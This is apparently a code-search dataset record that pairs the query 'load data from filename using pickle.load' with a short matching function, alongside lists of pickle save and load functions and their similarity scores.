{}\".format(fn))", "def save(object, filename, protocol = 0):\n file = gzip.GzipFile(filename, 'wb')\n file.write(pickle.dumps(object, protocol))\n file.close()", "def pickleSave(object, filename):\n #Todo: Handle exceptions from pickle\n filehandler = open(\"obj/\" + filename + \".obj\", 'wb')\n pickle.dump(object, filehandler)", "def save(self, filename):\n cPickle.dump(self, open(filename, \"wb\"))", "def pickle_data(filename, data):\n f = open(filename, \"wb\")\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\n f.close()", "def save(self, file_name):\n saved_data = { \"start_config\" : self.start_config, \"action_storage\" : self.action_storage } \n with open(file_name, 'wb') as fh:\n pickle.dump(saved_data, fh)", "def saveVar(var,name):\n with open(name+'.pickle','wb') as fl:\n pickle.dump(var,fl)", "def saveStuff(stuff, path=None):\n if path == None:\n # TODO take name from something\n output = open('results/i-will-be-overwritten.pkl', 'wb')\n else:\n output = open(path, 'wb')\n\n # Pickle the list using the highest protocol available.\n cPickle.dump(stuff, output, -1)\n output.close()", "def saveStuff(stuff, path=None):\n if path == None:\n # TODO take name from something\n output = open('results/i-will-be-overwritten.pkl', 'wb')\n else:\n output = open(path, 'wb')\n\n # Pickle the list using the highest protocol available.\n cPickle.dump(stuff, output, -1)\n output.close()", "def save(self, filename='test'):\n file = open(filename+'.txt','w')\n pickle.dump(self, file)\n file.close()", "def save_pickle(obj, filename):\n with open(filename, 'wb') as file:\n pickle.dump(obj, file)", "def save(self, output, data):\n pass", "def save_data(data: Any, file_name: str) -> None:\n with open(file_name, \"wb\") as output:\n pickle.dump(data, output)", "def do_pickle(self, arg):\n try:\n from pickling import Pickling\n Pickling(arg, input(\"Please enter the name of file: \")).pickle_it()\n except TypeError as e:\n print(e)\n except():\n print(\"Error!!\")", "def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump({'wi': self.W_input_to_hidden, 'wo': self.W_hidden_to_output}, f)", "def save_data_pickle(PATH, data, dataset, filename):\n with open(PATH + '/' + dataset + \"_\" + filename + \".pkl\",\"wb\") as f:\n pickle.dump(data,f)\n print(filename, \"created\")", "def storePickle(filename, fit_diff_matrix):\n store_filename = filename + \".pickle\"\n with open(store_filename, \"wb\") as f:\n pickle.dump(fit_diff_matrix, f)", "def write_to_file(name, obj):\n\n print 'writing structures to pickle'\n print '----------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'wb')\n pickle.dump(obj, file)\n file.close()", "def save(self):\n pickle.dump(self, open(self.path, \"wb\"))", "def save(self, filename):\n with gzip.open(filename, \"w\") as f:\n f.write(pickle.dumps(self))", "def save(self, filename):\n Util.savePickle(self.V, filename + self.ext, overwrite=True)\n return filename + self.ext", "def save(self, filename):\n pass", "def save_to_disk(name, object):\n shortname = _dumpify(_compress_name(name) + '.pkl')\n print 'save_to_disk(%s)' % shortname\n pkl_file = open(shortname , 'wb')\n pickle.dump(object, pkl_file, -1) # Pickle the list using the highest protocol available.\n pkl_file.close()", "def save_pickle(file, variable):\n if file.split('.')[-1] != \"pkl\":\n file += \".pkl\"\n\n with open(file, 'wb') as f:\n pickle.dump(variable, f)\n print(\"Variable successfully saved in \" + file)", "def to_pickle(self, filename, **kwargs):\n 
with open(filename, 'wb') as f:\n pickle.dump(self, f)", "def pickle_dump(file_name: str, data: Any):\n with open(file_name, 'wb') as file:\n pickle.dump(data, file, protocol=pickle.HIGHEST_PROTOCOL)", "def save(self, fname):\n pass", "def save_as(self, filename: str) -> None:\n save_data = lzma.compress(pickle.dumps(self))\n with open(filename, \"wb\") as f:\n f.write(save_data)", "def _save_obj(obj, name):\n with open('/bigdisk/pickles/' + name, 'w') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save(data, phonebook):\n\n with open(phonebook, \"w\") as outfile:\n cPickle.dump(data, outfile)", "def savePickle(object, name):\n epoch = time.time()\n filename = name + str(epoch) + \".pkl\" # Save name\n fullPath = path.join(PICKLE_DIR, filename) # Save path\n\n # Get permissions and save the file\n with open(fullPath, \"w\") as outfile:\n pickle.dump(object, outfile)", "def save(object, filename, protocol = 0):\n file = gzip.GzipFile(filename, 'wb')\n file.write(pickle.dumps(object, protocol))\n file.close()", "def save(self, fname):\n with open(fname, \"wb\") as f:\n cloudpickle.dump(self, f)\n # pickle.dump(self, open(fname, 'wb'))", "def _save(self):\n # TODO: Use local.punny dump (when written)\n with open(filename, 'w') as f:\n pickle = Pickler(f)\n pickle.dump(self.pungen.puns)", "def save(self, filename = 'array_zest', path = '/home/eric/dev/insitu/data/zs_recovery/'):\n filename = filename# + '_Lx_' + str(self.Lx) + 'm_Ly_' + str(self.Ly) + 'm'\n self.path_filename = path + filename + '.pkl'\n f = open(self.path_filename, 'wb')\n pickle.dump(self.__dict__, f, 2)\n f.close()", "def save(self, target):\n from six.moves.cPickle import dump\n data = self.serialize()\n with open(target, 'wb') as f:\n dump(data, f)", "def save(self, target):\n from six.moves.cPickle import dump\n data = self.serialize()\n with open(target, 'wb') as f:\n dump(data, f)", "def dump_pickle_data(obj, filename):\n path = \"../tmp/{}.pckl\".format(filename)\n f = open(path, 'wb')\n pickle.dump(obj, f)\n f.close()", "def save(self, p):\n pickle.dump(p, open('save.dat', 'wb'))\n print(\"Game Saved!\")", "def save_model(self, step):\n\n # file_name = params['name']\n # pickle.dump(self, gzip.open(file_name, 'wb'))", "def writePickle(self, filename):\n \n assert filename.endswith('.pkl')\n file = open(filename, 'wb')\n cPickle.dump(self, file, cPickle.HIGHEST_PROTOCOL)", "def save_pkl(dictionnary,directory,file_name):\n with open(f'saved_exp_info/{directory}/{file_name}.pkl', 'wb') as output:\n pickle.dump(dictionnary, output)", "def save_file(self, file_name: str):\n pickle.dump(self, open(file_name, \"wb\"))", "def save_dict_pickle(PATH, data, filename):\n with open(PATH + '/' + filename + \".pkl\",\"wb\") as f:\n pickle.dump(data,f)\n print(filename, \"created\")", "def save(self, file_name: str) -> None:\n with open(file_name, \"wb\") as f:\n pickle.dump(self, f)", "def save(self, filename):\n pass", "def save(self):\n if self.hasChanged:\n filePath = self.path\n tempPath = filePath+'.tmp'\n fileDir = os.path.split(filePath)[0]\n if not os.path.exists(fileDir): os.makedirs(fileDir)\n cPickle.dump(self.data,open(tempPath,'w'))\n renameFile(tempPath,filePath,True)\n self.hasChanged = False", "def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump({'wi': self.W_input_to_hidden, 'wh':\n self.W_hidden_to_hidden, 'wo': self.W_hidden_to_output}, f)", "def pickleToDisk(population, fName):\n pickle.dump(population, open(fName + \".pkl\", 'wb'), protocol=2)", "def write_pickle(obj, 
file_name):\n with open(file_name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def pickle_files(filename, stuff):\n save_stuff = open(filename, \"wb\")\n pickle.dump(stuff, save_stuff)\n save_stuff.close()", "def save_reaction(self, filename):\n filename = filename.replace('.pkl', '.gpkl')\n filename = filename.replace('.bpkl', '.gpkl')\n # Overwrites any existing file.\n with gzip.GzipFile(filename, 'wb') as output:\n pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)", "def store_outcome(model_name, dataset, strict, forgiving):\n model_name = model_name.replace('/', '-')\n\n with open(f'outcomes-{model_name}-{dataset}.pkl', 'wb') as file:\n\n pickle.dump((strict, forgiving), file)", "def save(self, target, withdP=False):\n from six.moves.cPickle import dump\n data = self.serialize(withdP=withdP)\n with open(target, 'wb') as f:\n dump(data, f)", "def save(self, target, withdP=False):\n from six.moves.cPickle import dump\n data = self.serialize(withdP=withdP)\n with open(target, 'wb') as f:\n dump(data, f)", "def pickle_dump(data, file):\n with open(file, 'wb') as f:\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)", "def serialize(self): \n with open(self.path+self.name, \"wb\") as pfile:\n pickle.dump(self.pyObj, pfile)", "def save_object(obj, filename):\r\n with open(filename, 'wb') as output:\r\n pickle.dump(obj, output)", "def save(self, filename=\"fitter.pickle\"):\n\n with open(filename, \"wb\") as outfile:\n pickle.dump(self, outfile)", "def save_obj(obj, name):\n \n with open(name + '.pkl', 'wb') as objec:\n pickle.dump(obj, objec)", "def storeData(data, filename='laue.dat'):\r\n import cPickle\r\n with open(filename, 'wb') as fp:\r\n cPickle.dump(data, fp)", "def save_object(obj, filename):\n with open(filename, 'wb') as output_file: # Overwrites any existing file.\n pickle.dump(obj, output_file, pickle.HIGHEST_PROTOCOL)", "def save(self, filename):\n import pickle\n if path.dirname(filename) and not path.exists(path.dirname(filename)):\n makedirs(path.dirname(filename))\n pickle.dump(self, open(filename, 'wb'), protocol=-1)", "def save_obj(obj, name):\r\n with open('../pickle/' + name + '.pkl', 'wb') as fout:\r\n pickle.dump(obj, fout, pickle.HIGHEST_PROTOCOL)\r\n # end with\r", "def save(self, filename):\n raise NotImplementedError", "def save_object(obj, filename):\n with open(filename, 'wb') as output:\n pickle.dump(obj, output, protocol=2)", "def _save(self):\n\t\t\n\t\tdirectory = self.Output_path\n\n\t\t# replace with \n\t\t# file_name = hermes.mk_themis_file_name(themis_obj = self)\n\t\tfile_name = f'Themis_{self.CELL_ID[\"experiment\"]}_u{self.CELL_ID[\"unit\"]}_c{self.CELL_ID[\"cell\"]}_r{self.CELL_ID[\"run\"]}.pkl'\n\n\t\tsave_path = directory / file_name\n\n\t\t# Atomic saving (helpful?)\n\t\ttemp_path = save_path.with_suffix(save_path.suffix + '.tmp')\n\t\t\n\t\tself.SavePath = save_path\n\n\t\t\n\t\twith open(temp_path, 'wb') as f:\n\t\t\tpickle.dump(self, f)\n\n\t\ttemp_path.rename(save_path)\n\n\t\tprint(f'Saved {self.RUN_KEY} as {save_path}')", "def save_obj(obj, saved_name ):\n with open( saved_name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def dump(self, filename):\n\n pickle.dump(self, open(filename, \"w\"))", "def dump(filename, data):\n _savez(filename, [], data, True, allow_pickle=False)", "def save_obj(obj, name):\n with open('../../data/' + name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save_obj(obj, name):\n with open('../../data/' + name + '.pkl', 'wb') as f:\n 
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)", "def save(obj, filename):\n import pickle\n with open(filename, 'w') as f:\n pickle.dump(obj, f, protocol=pickle.HIGHEST_PROTOCOL)", "def _persist_output(self, output, dir):\r\n try:\r\n mkdirp(dir)\r\n filename = os.path.join(dir, 'output.pkl')\r\n numpy_pickle.dump(output, filename, compress=self.compress)\r\n if self._verbose > 10:\r\n print('Persisting in %s' % dir)\r\n except OSError:\r\n \" Race condition in the creation of the directory \"", "def save(self, output, data):\n return", "def dump_pickle(path, data):\n with open(path, 'wb') as f:\n pickle.dump(data, f)", "def dumpme(self) :\n fileName = \"./data/oP4_ModelBuilder.dump\"\n with open(fileName,\"wb\") as dumpedFile:\n oPickler = pickle.Pickler(dumpedFile)\n oPickler.dump(self)" ]
[ "0.7272676", "0.7110179", "0.69229895", "0.67838925", "0.6766273", "0.67407393", "0.67352134", "0.6724542", "0.6718559", "0.6689364", "0.6684626", "0.6666956", "0.6617081", "0.6609867", "0.65701944", "0.65609634", "0.6513856", "0.6507621", "0.6492011", "0.64900124", "0.64834404", "0.64727414", "0.6456504", "0.6442476", "0.64262193", "0.64228386", "0.64211506", "0.64107746", "0.64028895", "0.6402235", "0.63937235", "0.63937235", "0.6384215", "0.63796264", "0.6378364", "0.6376644", "0.6369711", "0.63530374", "0.6351733", "0.63476294", "0.6340528", "0.6337898", "0.63343847", "0.6326211", "0.63173413", "0.63059753", "0.62885976", "0.6288581", "0.62729096", "0.62699234", "0.6269645", "0.6259444", "0.62581676", "0.6255301", "0.6248481", "0.6248042", "0.6243043", "0.6241996", "0.6238635", "0.6238635", "0.6230651", "0.6229042", "0.62276435", "0.62270343", "0.6226636", "0.62244284", "0.6220412", "0.6210598", "0.61994743", "0.61941606", "0.6191943", "0.6186726", "0.61837274", "0.61836463", "0.6182321", "0.61723036", "0.61711997", "0.61711997", "0.61711544", "0.6168584", "0.6165256", "0.6159613", "0.6159405", "0.61570436", "0.61480653", "0.6146384", "0.6135245", "0.6134986", "0.61346185", "0.6132699", "0.6130812", "0.61272156", "0.61208236", "0.61208093", "0.61208093", "0.6107578", "0.61074096", "0.61065066", "0.61061394", "0.6106117" ]
0.89019084
0
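For context on the store document above, here is a minimal, self-contained round-trip sketch; the temporary file name and the sample payload are arbitrary choices for illustration:

import os
import pickle
import tempfile

def store(obj, filename):
    # Serialize obj to filename; pickle writes bytes, so binary mode is required.
    with open(filename, 'wb') as cout:
        pickle.dump(obj, cout)

path = os.path.join(tempfile.gettempdir(), 'store_demo.pkl')
store({'a': 1, 'b': [2, 3]}, path)
with open(path, 'rb') as cin:
    assert pickle.load(cin) == {'a': 1, 'b': [2, 3]}
os.remove(path)

Opening in binary mode matters: pickle.dump writes bytes, so a text-mode handle fails on Python 3.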
load data from filename using pickle.load
import pickle

def grab(filename):
    with open(filename, 'rb') as cin:  # binary mode; the with-block also closes the file
        return pickle.load(cin)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load(filename):\n with open(filename,'rb') as f:\n return pickle.load(self,f)", "def load_data(file_name):\n with open(file_name, 'rb') as f:\n data = pickle.load(f)\n return data", "def load_pickle_data(filename):\n path = \"../tmp/{}.pckl\".format(filename)\n if os.path.exists(path):\n print(\"LOADING PCKL FILE FROM {}\".format(path))\n f = open(path, 'rb')\n obj = pickle.load(f)\n f.close()\n return obj", "def load(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)", "def load(filename):\n import pickle\n return pickle.load(open(filename, 'r'))", "def load(fname):\r\n with open(fname, 'rb') as f:\r\n data = pickle.load(f)\r\n return data", "def load_file(self, filename):\n with open(filename, \"rb\") as pickle_handle:\n return pickle.load(pickle_handle)", "def load_data_loader_from_file(cls, filename):\n print(\"Loading data loader from file: {}\".format(filename))\n\n with open(filename, \"rb\") as file:\n return pickle.load(file)", "def load_object(self, filename):\n with open(filename, 'rb') as inp: # Overwrites any existing file.\n data = pickle.load(inp)\n return data", "def _unpickle(filename):\n\n # Create full path for the file.\n file_path = _get_file_path(filename)\n\n print(\"Loading data: \" + file_path)\n\n with open(file_path, mode='rb') as file:\n # In Python 3.X it is important to set the encoding,\n # otherwise an exception is raised here.\n data = pickle.load(file, encoding='bytes')\n\n return data", "def pload(filename):\n return pickle.load(open(filename, 'rb'))", "def _load_file(name):\n filename = 'ind.{}.{}'.format(dataset_name, name)\n filename = os.path.join(path, filename)\n with open(filename, 'rb') as f:\n if sys.version_info > (3, 0):\n return pickle.load(f, encoding='latin1') # pylint: disable=unexpected-keyword-arg\n else:\n return pickle.load(f)", "def load_data():\n with open('data.pickle', 'rb') as f:\n data = pickle.load(f)\n return data", "def load(filename):\n try:\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n return data\n except FileNotFoundError:\n return None", "def load(self, filename):\n import pickle\n return pickle.load(open(filename, 'rb'))", "def __init__(self, name, loadfile=None, loadpath=''):\n \n self.name = name\n \n if loadfile==None:\n self.data = []\n else:\n with open(loadpath+loadfile) as currentfile:\n self.data = pickle.load(currentfile)", "def load_data_pickle(PATH, dataset, filename):\n with open(PATH + '/' + dataset + \"_\" + filename + \".pkl\",\"rb\") as f:\n new_data = pickle.load(f)\n\n # print(filename, \"opened\")\n return new_data", "def load_data(file_name: str) -> Optional[Any]:\n with open(file_name, \"rb\") as input_data:\n data = pickle.load(input_data)\n return data", "def load_data(filename) :\r\n data = Data()\r\n data.load(filename)\r\n return data", "def load(self, filename):\n raise NotImplementedError", "def load(cls, filename):\n return cPickle.load(open(filename, \"rb\"))", "def load(self, filename):\n pass", "def Load_Data(savedfilename):\n import pickle\n\n try:\n\n with open(savedfilename, 'rb') as handle:\n loaded_data = pickle.load(handle)\n print\n 'loaded successfully, fileloaded as as:\\nloaded_data'\n return loaded_data\n except:\n import numpy as np\n loaded_data = np.load(savedfilename)\n return loaded_data", "def pickle_load(file_name: str) -> Any:\n with open(file_name, 'rb') as file:\n return pickle.load(file)", "def load(self):\n logger.debug('Loading state from file %s', self.file_path)\n\n with open(self.file_path, 'rb') as f:\n self.data = 
pickle.load(f)", "def load (self, filename) :\n\t\tserialFile = open (filename, \"rb\")\n\t\tself.production_rules = pickle.load (serialFile)\n\t\tself.unitrelation = pickle.load (serialFile)\n\t\tself.labels = pickle.load (serialFile)\n\t\tself.keeper = pickle.load (serialFile)\n\t\tself.strnodes = pickle.load(serialFile)\n\t\tself.tokens = pickle.load (serialFile)\n\t\tserialFile.close()", "def pickle_from_file(fname):\n\ttry:\n\t\tfh = open(fname, 'r')\n\t\tdata = cPickle.load(fh)\n\t\tfh.close()\n\texcept:\n\t\t#raise\n\t\tprint \"Loading pickled data failed!\", sys.exc_info()[0]\n\t\tdata = None\n \n\treturn data", "def pickleLoad(filename):\n #Todo: Handle exceptions from pickle\n filehandler = open(\"obj/\" + filename + \".obj\", 'rb')\n object = pickle.load(filehandler)\n return object", "def load_pkl_data(path):\n with open(path, 'rb') as fi:\n data = pickle.load(fi)\n return data", "def load(self, filename):\n with open(filename, 'r') as f:\n self.components, self.mean = pickle.load(f)", "def load_pickle(path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data", "def load_obj(name):\n with open('../../data/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def load_obj(name):\n with open('../../data/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def load_pickle(filename):\n with open(filename, 'rb') as file:\n obj = pickle.load(file)\n return obj", "def load(cls,filename):\n obj = None\n f = open(filename,'r')\n try:\n obj = pickle.load(f)\n obj.filename = filename\n finally:\n f.close()\n return obj", "def load_pickle(filename):\n\n with open(filename, 'rb') as file:\n if filename.split('.')[-1] == 'dill':\n obj = dill.load(file)\n else:\n obj = pickle.load(file)\n return obj", "def load_pickle(filename):\n with open(filename, \"rb\") as f:\n obj = pickle.load(f)\n\n return obj", "def load_files(filename):\n saved_stuff = open(filename, \"rb\")\n stuff = pickle.load(saved_stuff)\n saved_stuff.close()\n return stuff", "def load(self, filename = 'array_zest', path = '/home/eric/dev/insitu/data/zs_recovery/'):\n lpath_filename = path + filename + '.pkl'\n f = open(lpath_filename, 'rb')\n tmp_dict = pickle.load(f)\n f.close()\n self.__dict__.update(tmp_dict)", "def load_from_file(self, name):\n if os.path.isdir(\"saved_data\"):\n with open(f'saved_data/{name}.txt', 'rb') as file:\n data = pickle.load(file)\n print(\"Successfully load from file\")\n return data\n else:\n os.mkdir(\"saved_data\")\n self.load_from_file(name)", "def load_pkl(file_name):\n with open(file_name) as fp:\n data = pkl.load(fp)\n return data", "def load(self, filename=None, data=None):\n if filename is not None and data is None:\n with open(filename, 'rb') as fd:\n data = pickle.load(fd)\n elif filename is None and data is not None:\n pass\n else:\n raise ValueError(\"Exactly one of filename and data must be specified\")\n\n return self._load(data)", "def loadVar(name):\n with open(name+'.pickle','rb') as fl:\n return pickle.load(fl)", "def loadObj(name):\n\n with open(name + '.pkl', 'rb') as f:\n return pickle.load(f)", "def loadPickle(pickle_file):\n print(\"Loading pickle data from file: \"+pickle_file)\n\n data = None\n try:\n with open(pickle_file, \"rb\") as fd:\n data = pickle.load(fd)\n except EOFError:\n pass\n except pickle.UnpicklingError as upe:\n print(\"Failed: Loading Pickle Data\")\n except IOError:\n data = {}\n\n return data", "def inputfile(fileName):\n with open(fileName, \"rb\") as file:\n data = pickle.load(file)\n return data", "def 
load_pickle(file_name):\n with open(file_name, \"rb\") as handle:\n pickle_file = pickle.load(handle)\n\n return pickle_file", "def restoreData(filename='laue.dat'):\r\n import cPickle\r\n with open(filename, 'rb') as fp:\r\n return cPickle.load(fp)", "def pickle_load(path):\n data = pickle.load(open(os.path.join(os.getcwd(), path), 'rb'))\n return data", "def load(self,filename=None): # return True\r\n pass", "def load_data(self) -> None:", "def load(file_path):\n\t# assert type(file_path) == str, 'File_path must be a string'\n\t\n\twith open(file_path, 'rb') as f:\n\t\treturn pickle.load(f)", "def load(self):\r\n self.read(self.filename)", "def load_pickle(file):\n with open(file, 'rb') as fh:\n datum = pickle.load(fh)\n\n return datum", "def read_data(self, workfile='workfile_tmp.p'):\n self.data = pickle.load(open(workfile, 'rb'))", "def read_data(self, workfile='workfile_tmp.p'):\n self.data = pickle.load(open(workfile, 'rb'))", "def parse_pickle(filename):\n \n with open(filename) as file:\n return pickle.load(file)", "def load_obj(name):\r\n with open('../pickle/' + name + '.pkl', 'rb') as fout:\r\n return pickle.load(fout)\r\n # end with\r", "def read_from_file(name):\n print 'reading structures from pickle'\n print '------------------------------'\n\n path = os.getcwd() + '/pickles/' + name + '.pkl'\n file = open(path, 'rb')\n new_obj = pickle.load(file)\n file.close()\n\n return new_obj", "def unpickle(filename: str) -> dict:\n with open(os.path.join(f\"{ROOT_DIR}/dataset/\", filename), \"rb\") as file:\n dict = pickle.load(file, encoding=\"bytes\")\n return dict", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def _load_data(self, filename):\n if not os.path.isfile(filename):\n return False\n\n with open(filename) as f:\n data = pickle.load(f)\n if data:\n self.profiles = data['profiles']\n self.user_data = data['user_data']\n self.api_data = data['api_data']\n else:\n return False", "def pickle_loader(fileobj):\n if isinstance(fileobj, bytes):\n data = pickle.loads(fileobj, encoding=\"latin1\")\n elif isinstance(fileobj, six.string_types):\n with open(fileobj, 'rb') as f:\n data = pickle.load(f, encoding=\"latin1\")\n elif hasattr(fileobj, 'read'):\n data = pickle.load(fileobj, encoding=\"latin1\")\n else:\n raise ValueError('fileobj is not a filename or a file object')\n return data", "def load_synthetic_data():\n\n pickle_object = FM().data_file \n\n with pickle_object.open('rb') as data_file: \n return pickle.load(data_file)", "def _load_obj(name):\n with open('/bigdisk/pickles/' + name, 'r') as f:\n return pickle.load(f)", "def load(self, which):\n\t\tpath = os.path.join(self.storagedir, which)\n\t\tprint(\"Loading from\", path)\n\t\twith open(path, \"rb\") as handle:\n\t\t\tsetattr(self, which, _pickle.load(handle))", "def safe_pickle_load(file_name):\n try:\n f = open(file_name, \"r\")\n try:\n data = pickle.load(f)\n except EOFError:\n data = None\n finally:\n f.close()\n except IOError:\n data = None\n\n return data", "def load(cls, filename, **kwargs):\n with open(filename, 'rb') as fin:\n self = pickle.load(fin, **kwargs)\n self._check_types()\n return self", "def load_data(filename):\r\n with open(filename,'rb') as f:\r\n data = pk.load(f,encoding='bytes')\r\n return data[b'data'],data[b'labels']", "def load_from_file(self, filename):\n # clear datastore mape\n self._datastoreMap = {}\n # citanje filea\n with open(filename, 'rb') as f:\n binstr = f.read()\n inMap = pickle.loads(binstr)\n # za svaki kanal moramo dodati element u 
_datastoreMap\n for kanal in inMap:\n # stvaramo instancu Datastore\n self._datastoreMap[kanal] = DataStore()\n # instanca Datastore zna se otpakirati iz mape (dictionary)\n self._datastoreMap[kanal].dict2store(inMap[kanal])", "def _load_binary(file_name):\n try:\n with open(file_name, 'rb') as f:\n return cp.load(f)\n except UnicodeDecodeError: # When loading Python 2 pickle from Python 3\n with open(file_name, 'rb') as f:\n return cp.load(f, encoding=\"latin1\")", "def load(self, filename):\n f = open(filename, 'rb')\n try:\n data = pickle.load(f)\n activities, schedules, resources, resourceAsignaments = data\n except (pickle.UnpicklingError, AttributeError, EOFError, ImportError, IndexError, ValueError, KeyError):\n raise InvalidFileFormatException('Unpickle failed')\n\n # Check activities, schedules, resources, resourceAsignaments have the right data structure\n for row in activities:\n if len(row) != 9:\n raise InvalidFileFormatException('Incorrect data on file')\n \n f.close()\n return data", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_output = data['wo']", "def load_pickle(path):\n with open(path, 'rb') as handle:\n return pickle.load(handle)", "def read_pickle(file_name):\n with open(file_name, 'rb') as f:\n obj = pickle.load(f)\n return obj", "def loads(data):\n return cPickle.loads(data)", "def load(cls, file_id):\n if not isinstance(file_id, file):\n handle = open(\n \"{:s}{:s}-{:d}.pckl\".format(\n DUMP_PATH,\n cls.__name__,\n file_id\n ),\n \"rb\")\n else:\n handle = file_id\n return pickle.load(handle)", "def load_model(self, file_name):\n with open(file_name, 'rb') as file:\n self.lin_reg = pickle.load(file)", "def loadData(dataPathFile):\r\n if dataPathFile[-3:] == 'pkl':\r\n dataBaseDict = pickle.load(open(dataPathFile, 'rb'))\r\n return dataBaseDict\r\n else:\r\n raise Exception('File that is trying to be loaded is not a pickle file\\n')", "def load_data():\r\n print ('Loadng all the file one time......')\r\n if not os.path.exists('cifar.pkl'):\r\n set_data()\r\n with open('cifar.pkl', 'rb') as cifar_pickle:\r\n data = six.moves.cPickle.load(cifar_pickle)\r\n return data", "def readDataFromPickle(config, filename):\n path = config.picklePath + filename\n\n # if stopid in pickle variable and it is a dataframe-> sort columns\n return pd.read_pickle(path)", "def pickle_load(path):\n try:\n data = pickle.load(open(path, \"rb\"))\n return data\n except UnpicklingError:\n unix_path = path.replace(\".pkl\", \"_unix.pkl\")\n try:\n data = pickle.load(open(unix_path, \"rb\"))\n return data\n except FileNotFoundError:\n path = _to_unix(path)\n data = pickle.load(open(path, \"rb\"))\n return data", "def load_data(self):", "def unpickle_data(file_name):\n infile = open(file_name, \"rb\")\n try:\n data = pickle.load(infile)\n except:\n data = {}\n infile.close()\n\n return data", "def loadPickle(filepath):\n\tf = open(filepath, 'rb')\n\tobj = pickle.load(f)\n\tf.close()\n\treturn obj", "def load_groups(filename):\r\n with open(filename, 'rb') as f:\r\n saved_data = pickle.load(f)\r\n return saved_data", "def load_object(filename):\r\n with open(filename, 'rb') as input:\r\n obj = pickle.load(input)\r\n return obj", "def load_mapping(filename):\n with open(filename + '.pkl', 'rb') as handle:\n return pickle.load(handle)", "def pickle(self,data,filename):\n pickle.dump(data, open(filename, 'wb'))", "def load(self, filename):\n with open(filename, 'rb') as f:\n 
data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_hidden = data['wh']\n self.W_hidden_to_output = data['wo']", "def load_pickle(filepath):\n logging.info('Loading object from pickle: {}'.format(filepath))\n with open(filepath, 'rb') as infile:\n return pickle.load(infile)", "def read_pickle(path):\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n\n return data", "def load_pickle(path):\n with open(path, 'rb') as f:\n pickle_file = pickle.load(f)\n file_name = re.findall(r\"/?[^/]+\", path)[-1].strip(\"/\")\n print(f\"Loaded {file_name}.\")\n return pickle_file", "def pickle_load(file_path):\n if not os.path.isfile(file_path):\n return None\n\n with open(file_path, 'rb') as f:\n return pickle.load(f)", "def load_data_set_from_pickle(file_name=None):\n if not file_name:\n try:\n file_name = max(glob.glob(os.path.join(__pickled_data_directory__, '*.chars74k-lite.gz')), key=os.path.getctime)\n except ValueError as e:\n log.error('Unable to load data set from file since no pickled files could be found, ')\n return None\n\n log.debug('Loading data set from file: %s' % file_name)\n return unpickle_data(file_name)", "def load_data(\n self, file_path: str = os.path.join(os.getcwd(), \"data_breast_cancer.p\")\n ) -> None:\n with open(file_path, \"rb\") as file:\n data = pickle.load(file)\n self.x_train, self.y_train = data[\"x_train\"], data[\"y_train\"]\n self.x_test, self.y_test = data[\"x_test\"], data[\"y_test\"]", "def open_pickle_file(file_name):\n print(\"Unpickling file \" + file_name)\n full_file_name = full_path(file_name)\n with open(full_file_name, mode='rb') as f:\n return pickle.load(f)", "def load_data_pickle(self, load_full=False):\n self.train = pd.read_pickle('../input/train_mod.pkl')\n self.test = pd.read_pickle('../input/test_mod.pkl')\n if load_full:\n self.train_full = pd.read_pickle('../input/train_full_mod.pkl')", "def load_dictionary(filename):\n filename = os.path.join(FILE_DIR, 'assets/obj/' + filename)\n try:\n with open(filename, 'rb') as input:\n return pickle.load(input)\n except Exception as e:\n print(\"exception\", e)", "def pickleload(path):\n with open(path, 'rb') as file:\n loaded = pickle.load(file)\n return loaded" ]
[ "0.7869546", "0.7829951", "0.7812556", "0.77086544", "0.76826143", "0.7677001", "0.76607376", "0.7654821", "0.7640084", "0.7521244", "0.75156707", "0.7463171", "0.7457279", "0.743854", "0.7430627", "0.7389005", "0.7344408", "0.73272413", "0.7275342", "0.72668594", "0.7232986", "0.7232883", "0.7228265", "0.72269726", "0.72066486", "0.71936893", "0.71740854", "0.71422744", "0.7137935", "0.71364707", "0.7132823", "0.7108738", "0.7108738", "0.7079098", "0.7074106", "0.7035405", "0.70230824", "0.7009045", "0.6985634", "0.69816726", "0.6972461", "0.69690603", "0.69661814", "0.6965648", "0.6958563", "0.69576585", "0.6945246", "0.69389296", "0.69364303", "0.6932124", "0.6924645", "0.6923586", "0.69224226", "0.69188523", "0.6916983", "0.6916983", "0.6909045", "0.6907214", "0.68619585", "0.6843989", "0.6836591", "0.68264335", "0.681761", "0.68156236", "0.6798232", "0.67977726", "0.6795571", "0.6795194", "0.6789722", "0.67873406", "0.6780652", "0.67763317", "0.67752737", "0.6755705", "0.67475593", "0.67463636", "0.6740027", "0.67399514", "0.6734372", "0.6731503", "0.6727815", "0.6709846", "0.6706473", "0.67027295", "0.66999316", "0.66965574", "0.6692341", "0.66900307", "0.66849905", "0.6684788", "0.6682241", "0.66821694", "0.66701895", "0.6665038", "0.66571206", "0.66533077", "0.6647079", "0.6640107", "0.6636412", "0.6636155" ]
0.68825763
58
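Similarly, a brief usage sketch pairing the grab document above with a writer; the path below is an illustrative assumption:

import os
import pickle
import tempfile

def grab(filename):
    # Deserialize one object from filename; binary mode is required by pickle.
    with open(filename, 'rb') as cin:
        return pickle.load(cin)

path = os.path.join(tempfile.gettempdir(), 'grab_demo.pkl')
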